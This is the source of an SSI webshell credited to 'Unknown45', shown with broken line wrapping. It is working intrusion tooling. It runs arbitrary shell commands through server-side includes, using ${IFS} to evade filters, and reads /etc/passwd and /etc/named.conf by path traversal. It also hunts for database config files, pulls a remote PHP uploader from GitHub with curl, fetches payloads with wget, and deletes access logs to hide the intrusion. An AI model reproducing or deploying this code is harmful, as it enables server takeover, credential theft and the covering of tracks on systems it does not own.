Aaa
Aaa
Aaa
<!--
Recoded? only changed and delete
copyright? Don't be a bastard dude!
~ Kata Bang zerobyte.id
-->
function unknown45()
{
var uri =
document.getElementById('comma
nd').value;
var rep = uri.replace(/[ ]/g,'$
{IFS}');
var res = encodeURI(uri);
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+encodeURI(rep)+"&&test";
}
function refresh() {
document.location.href="<!--
#echo var=DOCUMENT_NAME -->";
}
function checkfile() {
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"ls${IFS}-la";
}
function readpass() {
var
selectedobj=document.getElement
ById('readpass');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
selectedobj.style.display =
"none";
selectedobj.className
='hide';
}
}
function readnamed() {
var
selectedobj=document.getElement
ById('readnamed');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
selectedobj.style.display =
"none";
selectedobj.className
='hide';
}
}
function movefiles() {
var
selectedobj=document.getElement
ById('movefiles');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
selectedobj.style.display =
"none";
selectedobj.className
='hide';
}
}
function upfiles() {
var
selectedobj=document.getElement
ById('upfiles');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
selectedobj.style.display =
"none";
selectedobj.className
='hide';
}
}
function renamefiles() {
var
selectedobj=document.getElement
ById('renamefiles');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
selectedobj.style.display =
"none";
selectedobj.className
='hide';
}
}
function deletefiles() {
var
selectedobj=document.getElement
ById('deletefiles');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
selectedobj.style.display =
"none";
selectedobj.className
='hide';
}
}
function findfiles() {
var
selectedobj=document.getElement
ById('findfiles');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
selectedobj.style.display =
"none";
selectedobj.className
='hide';
}
}
function addupload()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"curl${IFS}-Ls$
{IFS}raw.githubusercontent.com/wh
oami-45/php-
code/main/uploader.php${IFS}|$
{IFS}tee${IFS}-a$
{IFS}uploader.php";
}
function checkroot() {
var uri = "ls -la ";
var rep = uri.replace(/[ ]/g,'$
{IFS}');
var res = encodeURI(uri);
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+encodeURI(rep)+"<!--#echo
var=DOCUMENT_ROOT -->";
}
function deletelog() {
var yakin = confirm("yakin hapus
access logs nya ?");
if (yakin == true) {
var uri = "rm -rf ";
var rep = uri.replace(/[ ]/g,'$
{IFS}');
var res = encodeURI(uri);
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+encodeURI(rep)+"<!--#echo
var=DOCUMENT_ROOT -->/../logs/
*";
} else {
return true;
}
}
function delsel() {
var uri = "rm -rf ";
var rep = uri.replace(/[ ]/g,'$
{IFS}');
var res = encodeURI(uri);
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+encodeURI(rep)+"<!--#echo
var=DOCUMENT_NAME --> |$
{IFS}clear${IFS}&&${IFS}echo$
{IFS}Done";
}
function movesatu()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"mv$
{IFS}"+document.getElementById('
movefile').value+"$
{IFS}../"+document.getElementById(
'movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../"+document.getElementById(
'movefile').value;
}
function movedua()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"mv$
{IFS}"+document.getElementById('
movefile').value+"$
{IFS}../../"+document.getElementByI
d('movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../../"+document.getElementByI
d('movefile').value;
}
function movetiga()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"mv$
{IFS}"+document.getElementById('
movefile').value+"$
{IFS}../../../"+document.getElementB
yId('movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../../../"+document.getElementB
yId('movefile').value;
}
function moveroot()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"mv$
{IFS}"+document.getElementById('
movefile').value+"${IFS}<!--#echo
var=DOCUMENT_ROOT
-->/"+document.getElementById('m
ovefile').value+"${IFS}&&$
{IFS}realpath${IFS}<!--#echo
var=DOCUMENT_ROOT
-->/"+document.getElementById('m
ovefile').value;
}
function upfile()
{
var url =
document.getElementById('linknya')
.value;
var https =
url.split("https://").join("");
var http =
https.split("http://").join("");
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"wget$
{IFS}"+encodeURI(http)+"$
{IFS}"+"--no-check-certificate$
{IFS}&&${IFS}ls${IFS}-la";
}
function renamefile()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"mv$
{IFS}"+document.getElementById('r
enameawal').value+"$
{IFS}"+document.getElementById('r
enameakhir').value+"${IFS}&&$
{IFS}ls${IFS}-la";
}
function deletefile()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"rm${IFS}-rf$
{IFS}"+document.getElementById('d
eletefile').value+"${IFS}&&${IFS}ls$
{IFS}-la";
}
function deleteinroot()
{
var yakin = confirm("yakin hapus
file ini di directory root ?");
if (yakin == true) {
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"rm${IFS}-rf${IFS}"+"<!--
#echo var=DOCUMENT_ROOT
-->/"+document.getElementById('de
letefile').value+"${IFS}&&${IFS}ls$
{IFS}-la${IFS}<!--#echo
var=DOCUMENT_ROOT -->";
} else {
return true;
}
}
function deletefiledua()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"rm${IFS}-rf$
{IFS}"+document.getElementById('d
eletedir').value+"/"+document.getEl
ementById('deletefiledua').value+"$
{IFS}&&${IFS}ls${IFS}-la$
{IFS}"+document.getElementById('d
eletedir').value;
}
function findfile()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"du${IFS}-ah${IFS}"+"|$
{IFS}grep$
{IFS}"+document.getElementById('fi
ndfile').value;
}
function findinroot()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"du${IFS}-ah${IFS}"+"<!--
#echo var=DOCUMENT_ROOT -->$
{IFS}"+"|${IFS}grep$
{IFS}"+document.getElementById('fi
ndfile').value;
}
function findfiledua()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"du${IFS}-ah$
{IFS}"+document.getElementById('fi
nddir').value+"${IFS}|${IFS}grep$
{IFS}"+document.getElementById('fi
ndfiledua').value;
}
function finddb()
{
document.location.href="<!--
#echo var=DOCUMENT_NAME
-->?"+"du${IFS}-ah${IFS}"+"<!--
#echo var=DOCUMENT_ROOT -->$
{IFS}"+"|${IFS}grep${IFS}-e$
{IFS}config.php${IFS}-e$
{IFS}database.php${IFS}-e$
{IFS}config.inc.php${IFS}-e$
{IFS}koneksi.php";
}
</script>
<style type="text/css">
.input {
background: transparent;
border-color: #ffffff;
border-width: thin;
border: groove;
cursor: pointer;
}
button {
cursor: pointer;
}
</style>
</head>
<body onload="checkaja()">
<font face=courier
size=2><i><center>SSI Webshell by
Unknown45<hr><font
face="courier" size=2>
<font size=2>Command : <input
type=text size=60 id=command
class="text" name="address1"
style="max-width: 100%; max-
height: 100%;"> <button
class="input" id="gas"
onclick="unknown45();">Execute</
button></center>
<br><br>Host : <b><!--#echo
var=HTTP_HOST --></b>
<br>Server Address : <b><!--
#echo var=SERVER_ADDR --></b>
<br>User : <b><!--#exec
cmd="id" --></b>
<br>System : <b><!--#exec
cmd="{uname,-nrv}" --></b>
<br><br>Current Path : <b><!--
#echo var=DOCUMENT_ROOT
--><!--#echo var=SCRIPT_NAME
--></b><br></i>
Python : <b><!--#exec
cmd="{test,-
e,/usr/bin/python}&&{echo,ON}||
{echo,OFF}" --></b> |
MySql : <b><!--#exec cmd="{test,-
e,/usr/bin/mysql}&&{echo,ON}||
{echo,OFF}" --></b> |
Perl : <b><!--#exec cmd="{test,-
e,/usr/bin/perl}&&{echo,ON}||
{echo,OFF}" --></b> |
Ruby : <b><!--#exec
cmd="{test,-
e,/usr/bin/ruby}&&{echo,ON}||
{echo,OFF}" --></b> |
Wget : <b><!--#exec
cmd="{test,-
e,/usr/bin/wget}&&{echo,ON}||
{echo,OFF}" --></b><hr>
<center><button
onclick="refresh()" style="float:
left;">Refresh</button> <button
onclick="checkfile()">list
file</button> <button
onclick="renamefiles()">rename
file</button> <button
onclick="movefiles()">move
file</button> <button
onclick="deletefiles()">delete
file</button> <button
onclick="findfiles()">find
file</button> <button
onclick="upfiles()">upload
file</button> <button
onclick="delsel()" style="float:
right;">Remove
Shell</button><br><br>
<button
onclick="readpass();">read
/etc/passwd</button> <button
onclick="readnamed();">read
/etc/named.conf</button> <button
onclick="addupload()">add
uploader.php</button> <button
onclick="checkroot()">check root
directory</button> <button
onclick="deletelog()">delete access
logs</button></center>
<hr></i>
Executed Command :
</font><b><font face="courier"
id="cmd"><!--#echo var=shl
--></font></b><br>
<textarea bgcolor=#e4e0d8
cols=121 rows=15 style="width:
100%">
<!--#exec cmd=$shl -->
</textarea>
<script>
var cmd =
document.getElementById("cmd").i
nnerHTML.split("${IFS}").join(" ");
document.getElementById("cmd").i
nnerHTML = cmd;
var gaskan =
document.getElementById("comma
nd");
gaskan.addEventListener("keyup",
function(event) {
if (event.keyCode === 13) {
event.preventDefault();
document.getElementById("gas").cl
ick();
}
});
</script>
<font face="courier" size="2"
id="readpass"
style="display:none"><br>Read :
<b>/etc/passwd</b><br>
<textarea bgcolor=#e4e0d8
cols=121 rows=15><!--#include
virtual="/../../../../../../../../../../../../../../et
c/passwd" --></textarea>
</font>
<font face="courier" size="2"
id="readnamed"
style="display:none"><br>Read :
<b>/etc/named.conf</b><br>
<textarea bgcolor=#e4e0d8
cols=121 rows=15><!--#include
virtual="/../../../../../../../../../../../../../../et
c/named.conf" --></textarea>
</font>
<font face="courier" size="2"
id="movefiles"
style="display:none"><br>Move file
to <b>previous
directory</b><br><br>
filename : <textarea
bgcolor="#e4e0d8" cols="25"
rows="1" id="movefile"
style="resize: none; outline: none"
required></textarea>
<button onclick="movesatu()">1
directory</button> <button
onclick="movedua()">2
directory</button> <button
onclick="movetiga()">3
directory</button> <button
onclick="moveroot()">root
directory</button>
</font>
<font face="courier" size="2"
id="renamefiles"
style="display:none"><br>Rename
<b>file</b><br><br>
<textarea bgcolor="#e4e0d8"
cols="25" rows="1"
id="renameawal" style="resize:
none; outline: none"
required></textarea> to <textarea
bgcolor="#e4e0d8" cols="25"
rows="1" id="renameakhir"
style="resize: none; outline: none"
required></textarea><br><button
onclick="renamefile()">Gaskan</bu
tton>
</font>
<font face="courier" size="2"
id="upfiles"
style="display:none"><br>Upload
<b>file</b><br><br>
Link : <textarea
bgcolor="#e4e0d8" cols="100"
rows="1" id="linknya"
style="resize: none; outline: none"
required></textarea> <button
onclick="upfile()">Gaskan</button>
</font>
<font face="courier" size="2"
id="deletefiles"
style="display:none"><br>delete
<b>file</b><br>
<textarea bgcolor="#e4e0d8"
cols="25" rows="1" id="deletefile"
style="resize: none; outline: none"
required></textarea> <button
onclick="deletefile()">Delete</butto
n> <button
onclick="deleteinroot()">Delete this
in root
directory</button><br><br>delete
<b>file</b> in <b>custom
directories</b><br><textarea
bgcolor="#e4e0d8" cols="25"
rows="1" id="deletefiledua"
style="resize: none; outline: none"
required></textarea> in directory
<textarea bgcolor="#e4e0d8"
cols="25" rows="1" id="deletedir"
style="resize: none; outline: none"
required></textarea> <button
onclick="deletefiledua()">Delete</b
utton>
</font>
<font face="courier" size="2"
id="findfiles"
style="display:none"><br>find
<b>files</b><br>
<textarea bgcolor="#e4e0d8"
cols="25" rows="1" id="findfile"
style="resize: none; outline: none"
required></textarea> <button
onclick="findfile()">Find</button>
<button onclick="finddb()">find
database location (beta)</button>
<button onclick="findinroot()">Find
this in root
directory</button><br><br>find
<b>files</b> in <b>custom
directories</b><br><textarea
bgcolor="#e4e0d8" cols="25"
rows="1" id="findfiledua"
style="resize: none; outline: none"
required></textarea> in directory
<textarea bgcolor="#e4e0d8"
cols="25" rows="1" id="finddir"
style="resize: none; outline: none"
required></textarea> <button
onclick="findfiledua()">Find</butto
n>
</font>
<hr>
<center>
<font face="courier"
size=2>Unknown45 - 2021<br><a
href="https://exploits.site"
target="_blank">https://exploits.site
</a></font></center>
</body>
</html>